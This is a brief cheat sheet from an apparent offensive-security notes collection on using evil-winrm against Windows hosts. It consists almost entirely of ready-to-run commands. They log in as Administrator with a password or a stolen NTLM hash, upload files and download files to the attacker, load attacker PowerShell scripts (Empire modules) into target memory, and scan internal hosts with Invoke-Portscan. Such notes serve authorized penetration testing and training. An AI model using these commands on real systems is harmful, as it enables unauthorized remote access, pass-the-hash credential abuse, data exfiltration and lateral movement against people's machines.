killchain-compendium/reverse shells/docs/evil-winrm.md

838 B

evil-winrm

  • Password or NTLM Hash as authenticator
evil-winrm -u Administrator -H <Hash> -i IP
evil-winrm -u Administrator -p <Password> -i IP -P <Port>

Upload & Download

  • On opened host
upload <attackerFilePath>
download <remoteFilePath> <attackerFilePath>

Load Powershell Scripts into Target Memory

  • Load attacker scripts into target's memory
evil-winrm -u <user> -p <password> -i IP -s <localScriptDir>
  • As an example, load Empire scripts dir for port scanning
evil-winrm -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -i 127.0.0.1 -P 8001 -s tools/post_exploitation/bc_security/Empire/empire/server/data/module_source/situational_awareness/network/
  • Init Invoke-Portscan.ps1
  • Get-Help Invoke-Portscan
Invoke-Portscan -Hosts 10.200.187.100 -TopPorts 50